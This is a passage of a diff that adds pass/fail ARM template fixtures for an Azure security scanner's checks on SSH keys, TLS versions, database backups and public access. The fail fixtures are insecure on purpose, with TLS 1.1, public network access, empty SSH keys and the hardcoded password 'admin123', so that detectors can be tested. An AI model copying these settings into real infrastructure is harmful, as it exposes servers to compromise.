+    "subnet2PrivateAddress": "10.0.2.5",
+    "publicIPAddressName": "[concat(uniquestring(resourceGroup().id), 'PublicIp')]",
+    "publicIPAddressType": "Dynamic",
+    "publicIPAddressId": "[resourceId('Microsoft.Network/publicIPAddresses', variables('publicIPAddressName'))]",
+    "networkSecurityGroupName": "default-NSG"
+  },
+  "resources": [
+
+    {
+      "type": "Microsoft.Compute/virtualMachines",
+      "apiVersion": "2020-06-01",
+      "dependsOn": [
+        "[resourceId('Microsoft.Storage/storageAccounts/', variables('storageAccountName'))]",
+        "[resourceId('Microsoft.Network/networkInterfaces/', variables('nic1Name'))]",
+        "[resourceId('Microsoft.Network/networkInterfaces/', variables('nic2Name'))]"
+      ],
+      "location": "[parameters('location')]",
+      "name": "fail",
+      "properties": {
+        "diagnosticsProfile": {
+          "bootDiagnostics": {
+            "enabled": true,
+            "storageUri": "[reference(resourceId('Microsoft.Storage/storageAccounts/', variables('storageAccountName')), '2019-06-01').primaryEndpoints.blob]"
+          }
+        },
+        "hardwareProfile": {
+          "vmSize": "[parameters('vmSize')]"
+        },
+        "networkProfile": {
+          "networkInterfaces": [
+            {
+              "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nic1Name'))]",
+              "properties": {
+                "primary": true
+              }
+            },
+            {
+              "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nic2Name'))]",
+              "properties": {
+                "primary": false
+              }
+            }
+          ]
+        },
+        "osProfile": {
+          "computerName": "[parameters('vmName')]",
+          "adminUsername": "[parameters('adminUsername')]",
+          "linuxConfiguration": {
+            "disablePasswordAuthentication": true,
+            "ssh": {
+              "publicKeys": [
+                {
+
+                }
+              ]
+            }
+          }
+        },
+        "storageProfile": {
+          "imageReference": {
+            "publisher": "[variables('imagePublisher')]",
+            "offer": "[variables('imageOffer')]",
+            "sku": "[parameters('ubuntuOSVersion')]",
+            "version": "latest"
+          },
+          "osDisk": {
+            "createOption": "FromImage"
+          }
+        }
+      }
+    },
+        {
+      "type": "Microsoft.Compute/virtualMachineScaleSets",
+      "name": "fail",
+      "location": "[parameters('location')]",
+      "apiVersion": "2019-12-01",
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/loadBalancers', variables('loadBalancerName'))]"
+      ],
+      "sku": {
+        "name": "[parameters('vmSku')]",
+        "capacity": "[parameters('instanceCount')]"
+      },
+      "properties": {
+        "overprovision": true,
+        "upgradePolicy": {
+          "mode": "Manual"
+        },
+        "virtualMachineProfile": {
+          "storageProfile": {
+            "osDisk": {
+              "createOption": "FromImage",
+              "caching": "ReadWrite"
+            },
+            "imageReference": {
+              "publisher": "Canonical",
+              "offer": "UbuntuServer",
+              "sku": "16.04-LTS",
+              "version": "latest"
+            }
+          },
+          "osProfile": {
+            "computerNamePrefix": "[parameters('vmssName')]",
+            "adminUsername": "[parameters('adminUsername')]",
+            "adminPassword": "[parameters('adminPasswordOrKey')]",
+            "linuxConfiguration": {
+            "disablePasswordAuthentication": true,
+            "ssh": {
+              "publicKeys": [
+                {
+
+                }
+              ]
+            }
+          }
+          },
+          "networkProfile": {
+            "networkInterfaceConfigurations": [
+              {
+                "name": "nic",
+                "properties": {
+                  "primary": true,
+                  "ipConfigurations": [
+                    {
+                      "name": "ipconfig",
+                      "properties": {
+                        "subnet": {
+                          "id": "[resourceId(parameters('existingVnetResourceGroupName'), 'Microsoft.Network/virtualNetworks/subnets', parameters('existingVnetName'), parameters('existingSubNetName'))]"
+                        },
+                        "loadBalancerBackendAddressPools": [
+                          {
+                            "id": "[resourceId('Microsoft.Network/loadBalancers/backendAddressPools', variables('loadBalancerName'), variables('loadBalancerBackEndName'))]"
+                          }
+                        ],
+                        "loadBalancerInboundNatPools": [
+                          {
+                            "id": "[resourceId('Microsoft.Network/loadBalancers/inboundNatPools', variables('loadBalancerName'), variables('loadBalancerNatPoolName'))]"
+                          }
+                        ]
+                      }
+                    }
+                  ]
+                }
+              }
+            ]
+          }
+        }
+      }
+    }
+  ],
+  "outputs": {
+    "sshCommand": {
+      "type": "string",
+      "value": "[concat('ssh ', parameters('adminUsername'), '@', parameters('vmName'), '.', parameters('location'), '.cloudapp.azure.com')]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_LinuxVMUsesSSH/pass.json b/tests/arm/checks/resource/example_LinuxVMUsesSSH/pass.json
new file mode 100644
index 00000000000..7a2fa9ba29d
--- /dev/null
+++ b/tests/arm/checks/resource/example_LinuxVMUsesSSH/pass.json
@@ -0,0 +1,229 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "adminUsername": {
+      "type": "string",
+      "defaultValue": "azureuser",
+      "metadata": {
+        "description": "User name for the Virtual Machine."
+      }
+    },
+    "sshKeyData": {
+      "type": "string",
+      "metadata": {
+        "description": "SSH rsa public key file as a string."
+      }
+    },
+    "vmName": {
+      "type": "string",
+      "defaultValue": "multinicvm",
+      "metadata": {
+        "description": "Name of the VM"
+      }
+    },
+    "vmSize": {
+      "defaultValue": "Standard_D2_v3",
+      "metadata": {
+        "description": "Size of the VM"
+      },
+      "type": "string"
+    },
+    "ubuntuOSVersion": {
+      "type": "string",
+      "defaultValue": "18.04-LTS",
+      "allowedValues": [
+        "12.04.5-LTS",
+        "14.04.4-LTS",
+        "15.10",
+        "18.04-LTS"
+      ],
+      "metadata": {
+        "description": "The Ubuntu version for the VM. This will pick a fully patched image of this given Ubuntu version. Allowed values: 12.04.5-LTS, 14.04.4-LTS, 15.10, 18.04-LTS."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "description"
+      }
+    }
+  },
+  "variables": {
+    "storageAccountName": "[concat(uniquestring(resourceGroup().id), 'samultinic')]",
+    "storageAccountType": "Standard_LRS",
+    "imagePublisher": "Canonical",
+    "imageOffer": "UbuntuServer",
+    "sshKeyPath": "[concat('/home/',parameters('adminUsername'),'/.ssh/authorized_keys')]",
+    "nic1Name": "nic1",
+    "nic2Name": "nic2",
+    "vnetName": "vnet",
+    "vnetId": "[resourceId('Microsoft.Network/virtualNetworks', variables('vnetName'))]",
+    "addressPrefix": "10.0.0.0/16",
+    "subnet1Name": "Frontend",
+    "subnet1Id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('vnetName'), variables('subnet1Name'))]",
+    "subnet1Prefix": "10.0.1.0/24",
+    "subnet1PrivateAddress": "10.0.1.5",
+    "subnet2Name": "Web",
+    "subnet2Id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('vnetName'), variables('subnet2Name'))]",
+    "subnet2Prefix": "10.0.2.0/24",
+    "subnet2PrivateAddress": "10.0.2.5",
+    "publicIPAddressName": "[concat(uniquestring(resourceGroup().id), 'PublicIp')]",
+    "publicIPAddressType": "Dynamic",
+    "publicIPAddressId": "[resourceId('Microsoft.Network/publicIPAddresses', variables('publicIPAddressName'))]",
+    "networkSecurityGroupName": "default-NSG"
+  },
+  "resources": [
+
+    {
+      "type": "Microsoft.Compute/virtualMachines",
+      "apiVersion": "2020-06-01",
+      "dependsOn": [
+        "[resourceId('Microsoft.Storage/storageAccounts/', variables('storageAccountName'))]",
+        "[resourceId('Microsoft.Network/networkInterfaces/', variables('nic1Name'))]",
+        "[resourceId('Microsoft.Network/networkInterfaces/', variables('nic2Name'))]"
+      ],
+      "location": "[parameters('location')]",
+      "name": "pass",
+      "properties": {
+        "diagnosticsProfile": {
+          "bootDiagnostics": {
+            "enabled": true,
+            "storageUri": "[reference(resourceId('Microsoft.Storage/storageAccounts/', variables('storageAccountName')), '2019-06-01').primaryEndpoints.blob]"
+          }
+        },
+        "hardwareProfile": {
+          "vmSize": "[parameters('vmSize')]"
+        },
+        "networkProfile": {
+          "networkInterfaces": [
+            {
+              "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nic1Name'))]",
+              "properties": {
+                "primary": true
+              }
+            },
+            {
+              "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nic2Name'))]",
+              "properties": {
+                "primary": false
+              }
+            }
+          ]
+        },
+        "osProfile": {
+          "computerName": "[parameters('vmName')]",
+          "adminUsername": "[parameters('adminUsername')]",
+          "linuxConfiguration": {
+            "disablePasswordAuthentication": true,
+            "ssh": {
+              "publicKeys": [
+                {
+                  "path": "/.ssh/authorized_keys",
+                  "keyData": "[parameters('sshKeyData')]"
+                }
+              ]
+            }
+          }
+        },
+        "storageProfile": {
+          "imageReference": {
+            "publisher": "[variables('imagePublisher')]",
+            "offer": "[variables('imageOffer')]",
+            "sku": "[parameters('ubuntuOSVersion')]",
+            "version": "latest"
+          },
+          "osDisk": {
+            "createOption": "FromImage"
+          }
+        }
+      }
+    },
+        {
+      "type": "Microsoft.Compute/virtualMachineScaleSets",
+      "name": "pass",
+      "location": "[parameters('location')]",
+      "apiVersion": "2019-12-01",
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/loadBalancers', variables('loadBalancerName'))]"
+      ],
+      "sku": {
+        "name": "[parameters('vmSku')]",
+        "capacity": "[parameters('instanceCount')]"
+      },
+      "properties": {
+        "overprovision": true,
+        "upgradePolicy": {
+          "mode": "Manual"
+        },
+        "virtualMachineProfile": {
+          "storageProfile": {
+            "osDisk": {
+              "createOption": "FromImage",
+              "caching": "ReadWrite"
+            },
+            "imageReference": {
+              "publisher": "Canonical",
+              "offer": "UbuntuServer",
+              "sku": "16.04-LTS",
+              "version": "latest"
+            }
+          },
+          "osProfile": {
+            "computerNamePrefix": "[parameters('vmssName')]",
+            "adminUsername": "[parameters('adminUsername')]",
+            "adminPassword": "[parameters('adminPasswordOrKey')]",
+            "linuxConfiguration": {
+            "disablePasswordAuthentication": true,
+            "ssh": {
+              "publicKeys": [
+                {
+                  "path": "/.ssh/authorized_keys",
+                  "keyData": "[parameters('sshKeyData')]"
+                }
+              ]
+            }
+          }
+          },
+          "networkProfile": {
+            "networkInterfaceConfigurations": [
+              {
+                "name": "nic",
+                "properties": {
+                  "primary": true,
+                  "ipConfigurations": [
+                    {
+                      "name": "ipconfig",
+                      "properties": {
+                        "subnet": {
+                          "id": "[resourceId(parameters('existingVnetResourceGroupName'), 'Microsoft.Network/virtualNetworks/subnets', parameters('existingVnetName'), parameters('existingSubNetName'))]"
+                        },
+                        "loadBalancerBackendAddressPools": [
+                          {
+                            "id": "[resourceId('Microsoft.Network/loadBalancers/backendAddressPools', variables('loadBalancerName'), variables('loadBalancerBackEndName'))]"
+                          }
+                        ],
+                        "loadBalancerInboundNatPools": [
+                          {
+                            "id": "[resourceId('Microsoft.Network/loadBalancers/inboundNatPools', variables('loadBalancerName'), variables('loadBalancerNatPoolName'))]"
+                          }
+                        ]
+                      }
+                    }
+                  ]
+                }
+              }
+            ]
+          }
+        }
+      }
+    }
+  ],
+  "outputs": {
+    "sshCommand": {
+      "type": "string",
+      "value": "[concat('ssh ', parameters('adminUsername'), '@', parameters('vmName'), '.', parameters('location'), '.cloudapp.azure.com')]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/fail.json b/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/fail.json
new file mode 100644
index 00000000000..34dcc4540d4
--- /dev/null
+++ b/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/fail.json
@@ -0,0 +1,246 @@
+{
+    "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "parameters": {
+        "apiVersion": {
+            "type": "string",
+            "defaultValue": "2021-05-01"
+        },
+        "administratorLogin": {
+            "type": "string"
+        },
+        "administratorLoginPassword": {
+            "type": "securestring"
+        },
+        "location": {
+            "type": "string"
+        },
+        "serverName": {
+            "type": "string"
+        },
+        "serverEdition": {
+            "type": "string"
+        },
+        "vCores": {
+            "type": "int",
+            "defaultValue": 4
+        },
+        "storageSizeGB": {
+            "type": "int"
+        },
+        "haEnabled": {
+            "type": "string",
+            "defaultValue": "Disabled"
+        },
+        "availabilityZone": {
+            "type": "string",
+            "defaultValue": ""
+        },
+        "standbyAvailabilityZone": {
+            "type": "string"
+        },
+        "version": {
+            "type": "string"
+        },
+        "tags": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "firewallRules": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "backupRetentionDays": {
+            "type": "int"
+        },
+        "geoRedundantBackup": {
+            "type": "string"
+        },
+        "vmName": {
+            "type": "string",
+            "defaultValue": "Standard_B1ms"
+        },
+        "storageIops": {
+            "type": "int"
+        },
+        "storageAutogrow": {
+            "type": "string",
+            "defaultValue": "Enabled"
+        },
+        "autoIoScaling": {
+            "type": "string",
+            "defaultValue": "Disabled"
+        },
+        "identityData": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "dataEncryptionData": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "serverParameters": {
+            "type": "array",
+            "defaultValue": []
+        },
+        "aadEnabled": {
+            "type": "bool",
+            "defaultValue": false
+        },
+        "aadData": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "guid": {
+            "type": "string",
+            "defaultValue": "[newGuid()]"
+        },
+        "network": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "firewallRulesAPIVersion": {
+            "type": "string",
+            "defaultValue": "2022-01-01"
+        }
+    },
+    "variables": {
+        "api": "[parameters('apiVersion')]",
+        "firewallRules": "[parameters('firewallRules').rules]",
+        "serverParameters": "[parameters('serverParameters')]"
+    },
+    "resources": [
+        {
+              "type": "Microsoft.Sql/servers",
+              "apiVersion": "2023-05-01-preview",
+              "name": "fail",
+              "location": "string",
+              "tags": {
+                "tagName1": "tagValue1",
+                "tagName2": "tagValue2"
+              },
+              "identity": {
+                "type": "string",
+                "userAssignedIdentities": {
+                  "{customized property}": {}
+                }
+              },
+              "properties": {
+                "administratorLogin": "string",
+                "administratorLoginPassword": "string",
+                "administrators": {
+                  "administratorType": "ActiveDirectory",
+                  "azureADOnlyAuthentication": "bool",
+                  "login": "string",
+                  "principalType": "string",
+                  "sid": "string",
+                  "tenantId": "string"
+                },
+                "federatedClientId": "string",
+                "isIPv6Enabled": "string",
+                "keyId": "string",
+                "minimalTlsVersion": "1.1",
+                "primaryUserAssignedIdentityId": "string",
+                "publicNetworkAccess": "string",
+                "restrictOutboundNetworkAccess": "string",
+                "version": "string"
+              }
+            },
+        {
+            "condition": "[greater(length(variables('firewallRules')), 0)]",
+            "type": "Microsoft.Resources/deployments",
+            "apiVersion": "2019-08-01",
+            "name": "[concat('firewallRules-', parameters('guid'), '-', copyIndex())]",
+            "copy": {
+                "count": "[if(greater(length(variables('firewallRules')), 0), length(variables('firewallRules')), 1)]",
+                "mode": "Serial",
+                "name": "firewallRulesIterator"
+            },
+            "dependsOn": [
+                "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]",
+                "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]"
+            ],
+            "properties": {
+                "mode": "Incremental",
+                "template": {
+                    "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#",
+                    "contentVersion": "1.0.0.0",
+                    "resources": [
+                        {
+                            "type": "Microsoft.DBforMySQL/flexibleServers/firewallRules",
+                            "name": "[concat(parameters('serverName'),'/',variables('firewallRules')[copyIndex()].name)]",
+                            "apiVersion": "[parameters('firewallRulesAPIVersion')]",
+                            "properties": {
+                                "StartIpAddress": "[variables('firewallRules')[copyIndex()].startIPAddress]",
+                                "EndIpAddress": "[variables('firewallRules')[copyIndex()].endIPAddress]"
+                            }
+                        }
+                    ]
+                }
+            }
+        },
+        {
+            "condition": "[parameters('aadEnabled')]",
+            "type": "Microsoft.Resources/deployments",
+            "apiVersion": "2019-08-01",
+            "name": "[concat('addAdmins-', parameters('guid'))]",
+            "dependsOn": [
+                "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]"
+            ],
+            "properties": {
+                "mode": "Incremental",
+                "template": {
+                    "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+                    "contentVersion": "1.0.0.0",
+                    "resources": [
+                        {
+                            "type": "Microsoft.DBforMySQL/flexibleServers/administrators",
+                            "name": "[concat(parameters('serverName'),'/ActiveDirectory')]",
+                            "apiVersion": "[variables('api')]",
+                            "properties": {
+                                "administratorType": "[parameters('aadData').administratorType]",
+                                "identityResourceId": "[parameters('aadData').identityResourceId]",
+                                "login": "[parameters('aadData').login]",
+                                "sid": "[parameters('aadData').sid]",
+                                "tenantId": "[parameters('aadData').tenantId]"
+                            }
+                        }
+                    ]
+                }
+            }
+        },
+        {
+            "condition": "[and(greater(length(variables('serverParameters')), 0), parameters('aadEnabled'))]",
+            "type": "Microsoft.Resources/deployments",
+            "apiVersion": "2019-08-01",
+            "copy": {
+                "count": "[if(greater(length(variables('serverParameters')), 0), length(variables('serverParameters')), 1)]",
+                "mode": "serial",
+                "name": "serverParametersIterator"
+            },
+            "dependsOn": [
+                "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]",
+                "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]"
+            ],
+            "name": "[concat('serverParameters-', copyIndex(), '-', parameters('guid'))]",
+            "properties": {
+                "mode": "Incremental",
+                "template": {
+                    "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#",
+                    "contentVersion": "1.0.0.0",
+                    "resources": [
+                        {
+                            "type": "Microsoft.DBforMySQL/flexibleServers/configurations",
+                            "name": "[concat(parameters('serverName'),'/',variables('serverParameters')[copyIndex()].name)]",
+                            "apiVersion": "[variables('api')]",
+                            "properties": {
+                                "value": "[variables('serverParameters')[copyIndex()].value]",
+                                "source": "[variables('serverParameters')[copyIndex()].source]"
+                            }
+                        }
+                    ]
+                }
+            }
+        }
+    ]
+}
diff --git a/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/pass.json b/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/pass.json
new file mode 100644
index 00000000000..5244f95722e
--- /dev/null
+++ b/tests/arm/checks/resource/example_MSSQLServerMinTLSVersion/pass.json
@@ -0,0 +1,246 @@
+{
+    "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "parameters": {
+        "apiVersion": {
+            "type": "string",
+            "defaultValue": "2021-05-01"
+        },
+        "administratorLogin": {
+            "type": "string"
+        },
+        "administratorLoginPassword": {
+            "type": "securestring"
+        },
+        "location": {
+            "type": "string"
+        },
+        "serverName": {
+            "type": "string"
+        },
+        "serverEdition": {
+            "type": "string"
+        },
+        "vCores": {
+            "type": "int",
+            "defaultValue": 4
+        },
+        "storageSizeGB": {
+            "type": "int"
+        },
+        "haEnabled": {
+            "type": "string",
+            "defaultValue": "Disabled"
+        },
+        "availabilityZone": {
+            "type": "string",
+            "defaultValue": ""
+        },
+        "standbyAvailabilityZone": {
+            "type": "string"
+        },
+        "version": {
+            "type": "string"
+        },
+        "tags": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "firewallRules": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "backupRetentionDays": {
+            "type": "int"
+        },
+        "geoRedundantBackup": {
+            "type": "string"
+        },
+        "vmName": {
+            "type": "string",
+            "defaultValue": "Standard_B1ms"
+        },
+        "storageIops": {
+            "type": "int"
+        },
+        "storageAutogrow": {
+            "type": "string",
+            "defaultValue": "Enabled"
+        },
+        "autoIoScaling": {
+            "type": "string",
+            "defaultValue": "Disabled"
+        },
+        "identityData": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "dataEncryptionData": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "serverParameters": {
+            "type": "array",
+            "defaultValue": []
+        },
+        "aadEnabled": {
+            "type": "bool",
+            "defaultValue": false
+        },
+        "aadData": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "guid": {
+            "type": "string",
+            "defaultValue": "[newGuid()]"
+        },
+        "network": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "firewallRulesAPIVersion": {
+            "type": "string",
+            "defaultValue": "2022-01-01"
+        }
+    },
+    "variables": {
+        "api": "[parameters('apiVersion')]",
+        "firewallRules": "[parameters('firewallRules').rules]",
+        "serverParameters": "[parameters('serverParameters')]"
+    },
+    "resources": [
+        {
+              "type": "Microsoft.Sql/servers",
+              "apiVersion": "2023-05-01-preview",
+              "name": "pass",
+              "location": "string",
+              "tags": {
+                "tagName1": "tagValue1",
+                "tagName2": "tagValue2"
+              },
+              "identity": {
+                "type": "string",
+                "userAssignedIdentities": {
+                  "{customized property}": {}
+                }
+              },
+              "properties": {
+                "administratorLogin": "string",
+                "administratorLoginPassword": "string",
+                "administrators": {
+                  "administratorType": "ActiveDirectory",
+                  "azureADOnlyAuthentication": "bool",
+                  "login": "string",
+                  "principalType": "string",
+                  "sid": "string",
+                  "tenantId": "string"
+                },
+                "federatedClientId": "string",
+                "isIPv6Enabled": "string",
+                "keyId": "string",
+                "minimalTlsVersion": "1.2",
+                "primaryUserAssignedIdentityId": "string",
+                "publicNetworkAccess": "string",
+                "restrictOutboundNetworkAccess": "string",
+                "version": "string"
+              }
+            },
+        {
+            "condition": "[greater(length(variables('firewallRules')), 0)]",
+            "type": "Microsoft.Resources/deployments",
+            "apiVersion": "2019-08-01",
+            "name": "[concat('firewallRules-', parameters('guid'), '-', copyIndex())]",
+            "copy": {
+                "count": "[if(greater(length(variables('firewallRules')), 0), length(variables('firewallRules')), 1)]",
+                "mode": "Serial",
+                "name": "firewallRulesIterator"
+            },
+            "dependsOn": [
+                "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]",
+                "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]"
+            ],
+            "properties": {
+                "mode": "Incremental",
+                "template": {
+                    "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#",
+                    "contentVersion": "1.0.0.0",
+                    "resources": [
+                        {
+                            "type": "Microsoft.DBforMySQL/flexibleServers/firewallRules",
+                            "name": "[concat(parameters('serverName'),'/',variables('firewallRules')[copyIndex()].name)]",
+                            "apiVersion": "[parameters('firewallRulesAPIVersion')]",
+                            "properties": {
+                                "StartIpAddress": "[variables('firewallRules')[copyIndex()].startIPAddress]",
+                                "EndIpAddress": "[variables('firewallRules')[copyIndex()].endIPAddress]"
+                            }
+                        }
+                    ]
+                }
+            }
+        },
+        {
+            "condition": "[parameters('aadEnabled')]",
+            "type": "Microsoft.Resources/deployments",
+            "apiVersion": "2019-08-01",
+            "name": "[concat('addAdmins-', parameters('guid'))]",
+            "dependsOn": [
+                "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]"
+            ],
+            "properties": {
+                "mode": "Incremental",
+                "template": {
+                    "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+                    "contentVersion": "1.0.0.0",
+                    "resources": [
+                        {
+                            "type": "Microsoft.DBforMySQL/flexibleServers/administrators",
+                            "name": "[concat(parameters('serverName'),'/ActiveDirectory')]",
+                            "apiVersion": "[variables('api')]",
+                            "properties": {
+                                "administratorType": "[parameters('aadData').administratorType]",
+                                "identityResourceId": "[parameters('aadData').identityResourceId]",
+                                "login": "[parameters('aadData').login]",
+                                "sid": "[parameters('aadData').sid]",
+                                "tenantId": "[parameters('aadData').tenantId]"
+                            }
+                        }
+                    ]
+                }
+            }
+        },
+        {
+            "condition": "[and(greater(length(variables('serverParameters')), 0), parameters('aadEnabled'))]",
+            "type": "Microsoft.Resources/deployments",
+            "apiVersion": "2019-08-01",
+            "copy": {
+                "count": "[if(greater(length(variables('serverParameters')), 0), length(variables('serverParameters')), 1)]",
+                "mode": "serial",
+                "name": "serverParametersIterator"
+            },
+            "dependsOn": [
+                "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]",
+                "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]"
+            ],
+            "name": "[concat('serverParameters-', copyIndex(), '-', parameters('guid'))]",
+            "properties": {
+                "mode": "Incremental",
+                "template": {
+                    "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#",
+                    "contentVersion": "1.0.0.0",
+                    "resources": [
+                        {
+                            "type": "Microsoft.DBforMySQL/flexibleServers/configurations",
+                            "name": "[concat(parameters('serverName'),'/',variables('serverParameters')[copyIndex()].name)]",
+                            "apiVersion": "[variables('api')]",
+                            "properties": {
+                                "value": "[variables('serverParameters')[copyIndex()].value]",
+                                "source": "[variables('serverParameters')[copyIndex()].source]"
+                            }
+                        }
+                    ]
+                }
+            }
+        }
+    ]
+}
diff --git a/tests/arm/checks/resource/example_MariaDBGeoBackupEnabled/fail.json b/tests/arm/checks/resource/example_MariaDBGeoBackupEnabled/fail.json
new file mode 100644
index 00000000000..06e3d1ee74e
--- /dev/null
+++ b/tests/arm/checks/resource/example_MariaDBGeoBackupEnabled/fail.json
@@ -0,0 +1,26 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "apiVersion": "2018-06-01",
+      "type": "Microsoft.DBforMariaDB/servers",
+      "location": "West Europe",
+      "name": "fail",
+      "sku": {
+        "name": "B_Gen5_2",
+        "size": "5120"
+      },
+      "properties": {
+        "version": "10.3",
+        "administratorLogin": "admin",
+        "administratorLoginPassword": "admin123",
+        "publicNetworkAccess": "Enabled",
+        "storageProfile": {
+          "geoRedundantBackup":  "Disabled",
+          "storageMB": "5120"
+        }
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_MariaDBGeoBackupEnabled/pass.json b/tests/arm/checks/resource/example_MariaDBGeoBackupEnabled/pass.json
new file mode 100644
index 00000000000..c1f215cf7bb
--- /dev/null
+++ b/tests/arm/checks/resource/example_MariaDBGeoBackupEnabled/pass.json
@@ -0,0 +1,26 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "apiVersion": "2018-06-01",
+      "type": "Microsoft.DBforMariaDB/servers",
+      "location": "West Europe",
+      "name": "pass",
+      "sku": {
+        "name": "B_Gen5_2",
+        "size": "5120"
+      },
+      "properties": {
+        "version": "10.3",
+        "administratorLogin": "admin",
+        "administratorLoginPassword": "admin123",
+        "publicNetworkAccess": "Enabled",
+        "storageProfile": {
+          "geoRedundantBackup":  "Enabled",
+          "storageMB": "5120"
+        }
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_MariaDBPublicAccessDisabled/fail.json b/tests/arm/checks/resource/example_MariaDBPublicAccessDisabled/fail.json
new file mode 100644
index 00000000000..17d127061e1
--- /dev/null
+++ b/tests/arm/checks/resource/example_MariaDBPublicAccessDisabled/fail.json
@@ -0,0 +1,25 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "apiVersion": "2018-06-01",
+      "type": "Microsoft.DBforMariaDB/servers",
+      "location": "West Europe",
+      "name": "fail",
+      "sku": {
+        "name": "B_Gen5_2",
+        "size": "5120"
+      },
+      "properties": {
+        "version": "10.3",
+        "administratorLogin": "admin",
+        "administratorLoginPassword": "admin123",
+        "publicNetworkAccess": "Enabled",
+        "storageProfile": {
+          "storageMB": "5120"
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_MariaDBPublicAccessDisabled/pass.json b/tests/arm/checks/resource/example_MariaDBPublicAccessDisabled/pass.json
new file mode 100644
index 00000000000..5bb8115ad61
--- /dev/null
+++ b/tests/arm/checks/resource/example_MariaDBPublicAccessDisabled/pass.json
@@ -0,0 +1,25 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "apiVersion": "2018-06-01",
+      "type": "Microsoft.DBforMariaDB/servers",
+      "location": "West Europe",
+      "name": "pass",
+      "sku": {
+        "name": "B_Gen5_2",
+        "size": "5120"
+      },
+      "properties": {
+        "version": "10.3",
+        "administratorLogin": "admin",
+        "administratorLoginPassword": "admin123",
+        "publicNetworkAccess" :  "Disabled",
+        "storageProfile": {
+          "storageMB": "5120"
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/fail.json b/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/fail.json
new file mode 100644
index 00000000000..af482998d76
--- /dev/null
+++ b/tests/arm/checks/resource/example_MySQLServerMinTLSVersion/fail.json
@@ -0,0 +1,257 @@
+
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.26.54.24096",
+      "templateHash": "1923296876861958074"
+    }
+  },
+  "parameters": {
+    "serverName": {
+      "type": "string",
+      "metadata": {
+        "description": "Server Name for Azure database for MySQL"
+      }
+    },
+    "administratorLogin": {
+      "type": "string",
+      "minLength": 1,
+      "metadata": {
+        "description": "Database administrator login name"
+      }
+    },
+    "administratorLoginPassword": {
+      "type": "securestring",
+      "minLength": 8,
+      "metadata": {
+        "description": "Database administrator password"
+      }
+    },
+    "skuCapacity": {
+      "type": "int",
+      "defaultValue": 2,
+      "metadata": {
+        "description": "Azure database for MySQL compute capacity in vCores (2,4,8,16,32)"
+      }
+    },
+    "skuName": {
+      "type": "string",
